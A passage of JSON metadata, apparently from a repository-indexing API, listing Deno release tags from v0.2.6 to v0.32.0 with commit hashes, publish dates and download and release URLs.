tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":nu